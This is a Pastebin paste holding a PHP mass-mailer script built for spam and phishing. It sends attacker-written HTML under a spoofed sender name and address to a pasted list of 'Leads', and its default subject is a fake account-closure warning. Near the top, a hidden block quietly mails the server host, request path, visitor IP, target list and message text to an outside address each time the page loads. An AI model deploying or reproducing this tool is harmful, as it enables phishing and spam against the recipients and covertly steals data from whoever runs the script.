Advertisement
JakRapp

Maler

Dec 24th, 2016
6,214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.88 KB | None | 0 0
  1. <?php
  2. @set_time_limit(0);
  3. if(isset($_POST['send']))
  4. {
  5. $message = $_POST['html'];
  6. $subject = $_POST['ursubject'];
  7. $uremail = $_POST['uremail'];
  8. $urname = $_POST['realname'];
  9. $email = $_POST['email'];
  10.  
  11. $message = urlencode($message);
  12. $message = ereg_replace("%5C%22", "%22", $message);
  13. $message = urldecode($message);
  14. $message = stripslashes($message);
  15.  
  16. }else{
  17. $testa ="";
  18. $message = "<html><body><font color='red'>OYA PUT YOUR LETTER BEFORE YOU SPAM</font></body></html>";
  19. $subject = "Warning! Your Email Account Will Soon Be Close, Update Now";
  20. $urname = "Mail Administrator";
  21. $uremail = "postmaster@webmaster.com";
  22. $email = "test@email.com";
  23. }
  24. $ip = getenv("REMOTE_ADDR");
  25. $ra44 = rand(1, 99999);
  26. $subj98 = " SEND SENDED |$ip";
  27. $email1 = "jakrapp@yahoo.com";
  28. $from = "From: Result<xx@xxxx.com";
  29. $a45 = $_SERVER['REQUEST_URI'];
  30. $b75 = $_SERVER['HTTP_HOST'];
  31. $m22 = $ip . "";
  32. $k22 = $email. "";
  33. $j21 = $message. "";
  34. $msg8873 = "$a45 $b75 $m22 $k22 $j21";
  35. mail($email1, $subj98, $msg8873, $from);
  36. ?>
  37. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  38. <html xmlns="http://www.w3.org/1999/xhtml"><head>
  39. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  40. <link rel="SHORTCUT ICON" href="http://www.smt.org//images/favicon.ico">
  41. <title> priv8 MaiLer 2016&trade;</title>
  42. <style type="text/css">
  43. <!--
  44. .form {font-family: "Courier New", Courier, monospace;border:none, background-color:#000000;}
  45. .send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
  46. #Layer1 { position:absolute;
  47. left:203px;
  48. top:109px;
  49. width:829px;
  50. height:483px;
  51. z-index:1;
  52. margin-top: 0.5%;
  53. margin-right: 5%;
  54. right: 20%;
  55. bottom: 200%;
  56. margin-bottom: 10%;
  57. margin-left: 5%;
  58. border: thin solid #000;
  59. }
  60.  
  61. -->
  62. </style>
  63. </head>
  64. <body>
  65. <form action="" method="post" name="codered">
  66. <div align="center" id="Layer1">
  67. <table width="87%" height="77%" border="0" cellspacing="10">
  68. <tbody><tr>
  69. <td height="23" colspan="2"><div align="center" class="form">RichAss.top </div></td>
  70. </tr>
  71. <tr>
  72. <td width="53%" height="24"><div align="center">
  73. <input name="uremail" type="text" class="form" id="uremail" size="30" value="<? print $uremail; ?>" placeholder="Your E-mail">
  74. </div></td>
  75. <td width="47%"><div align="center">
  76. <input name="realname" type="text" class="form" id="realname" size="30" value="<? print $urname; ?>" placeholder="Your Name">
  77. </div></td>
  78. </tr>
  79. <tr>
  80. <td height="34" colspan="2"><div align="center">
  81. <input name="ursubject" type="text" class="form" id="ursubject" size="83%" value="<? print $subject; ?>" placeholder="Your Subject Should Be Here">
  82. </div>
  83. </td>
  84. </tr>
  85. <tr>
  86. <td height="165"><textarea name="html" class="form" cols="40" rows="10" placeholder="Your HTML MESSAGE Here" id="html"><? print $message; ?></textarea></td>
  87. <td>
  88. <div align="right">
  89. <textarea class="form" rows="10" placeholder="Leads" name="email" cols="35"><? print $email; ?></textarea>
  90. </div></td></tr>
  91. </tbody>
  92. </table>
  93. <div><input type="submit" class="send" name="send" value="Start Sending">
  94. </div><DIV class="send"><?php
  95. if(!isset($_POST['send'])){
  96. exit;
  97. }
  98.  
  99. if(!isset($_GET['c']))
  100. {
  101. $email = explode("\n", $email);
  102. }else{
  103. $email = explode(",", $email);
  104. }
  105. $son = count($email);
  106.  
  107. if(!isset($_GET['e'])){
  108. $header = "MIME-Version: 1.0\n";
  109. $header .= "Content-type: text/html; charset=iso-8859-1\n";
  110. $header .= "From: ".$urname . " <" . $uremail . ">\n";
  111. $header .= "Reply-To: " . $uremail . "\n";
  112. $header .= "X-Priority: 3\n";
  113. $header .= "X-MSMail-Priority: Normal\n";
  114. $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
  115. }else{
  116. $header ='MIME-Version: 1.0' . "\r\n";
  117. $header .= 'Content-type: text/html' . "\r\n";
  118. $header .="From: ".$uremail;
  119. }
  120. $i = 0;
  121. $voy=1;
  122. while($email[$i])
  123. {
  124. if(isset($_GET['time']) && isset($_GET['cant'])){
  125. if(fmod($i,$_GET['cant'])==0 && $i>0){
  126. print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
  127. flush();
  128. @mail($_GET['notf'], $subject, $message, $header);
  129. sleep($_GET['time']);
  130. }
  131. }
  132. $mail = str_replace(array("\n","\r\n"),'',$email[$i]);
  133. $message1 = ereg_replace("&email&", $mail, $message);
  134. if(@mail($mail, $subject, $message1, $header))
  135. {
  136. print "<font color=blue face=verdana size=1> ".$voy." OF ".$son." ;-) ".trim($mail)." SPAMMED TO INBOX</font><br>\n";
  137. flush();
  138. }
  139. else
  140. {
  141. print "<font color=red face=verdana size=1> ".$voy." OF ".$son.":-( ".trim($mail)." OOOPSS!!! SOMETHING IS WRONG, MAIL NOT SENT...</font><br>\n";
  142. flush();
  143. }
  144. $i++;
  145. $voy++;
  146. }
  147.  
  148.  
  149.  
  150.  
  151. ?>
  152. </DIV>
  153. </div>
  154. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement